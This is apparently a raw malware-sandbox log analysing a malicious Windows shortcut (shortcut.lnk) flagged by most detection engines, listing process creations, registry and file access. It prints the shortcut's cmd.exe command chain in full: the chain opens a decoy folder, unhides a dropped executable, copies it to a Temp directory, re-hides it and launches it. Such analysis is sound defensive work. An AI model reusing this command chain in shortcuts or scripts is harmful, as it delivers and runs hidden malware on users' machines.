Source: shortcut.lnk | ReversingLabs: Detection: 69% |
Source: shortcut.lnk | Virustotal: Detection: 72% |
Source: C:\Windows\explorer.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: classification engine | Classification label: mal72.winLNK@11/0@0/0 |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\windows\system32\cmd.exe" /c "C:\Windows\explorer.exe %cd%.DataStorage & attrib -s -h %cd%dBuXlYk.exe & xcopy /F /S /Q /H /R /Y %cd%dBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ & attrib +s +h %cd%dBuXlYk.exe & start C:\Users\user\AppData\Local\Temp\zHyIh\dBuXlYk.exe & exit |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe C:\Users\user\Desktop.DataStorage |
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -s -h C:\Users\user\DesktopdBuXlYk.exe |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\xcopy.exe xcopy /F /S /Q /H /R /Y C:\Users\user\DesktopdBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\DesktopdBuXlYk.exe |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe |
Source: unknown | Process created: C:\Windows\explorer.exe |
Source: C:\Windows\System32\cmd.exe | File read: C:\Users\desktop.ini |
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 |
Source: C:\Windows\explorer.exe | File opened: C:\Windows\SYSTEM32\MsftEdit.dll |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: LNK file | Process created: C:\Windows\System32\cmd.exe |
Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 351 |
Source: explorer.exe, 00000003.00000002.569217783.00000000061BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: unknown | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c "c:\windows\explorer.exe %cd%.datastorage & attrib -s -h %cd%dbuxlyk.exe & xcopy /f /s /q /h /r /y %cd%dbuxlyk.exe c:\users\user\appdata\local\temp\zhyih\ & attrib +s +h %cd%dbuxlyk.exe & start c:\users\user\appdata\local\temp\zhyih\dbuxlyk.exe & exit |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents |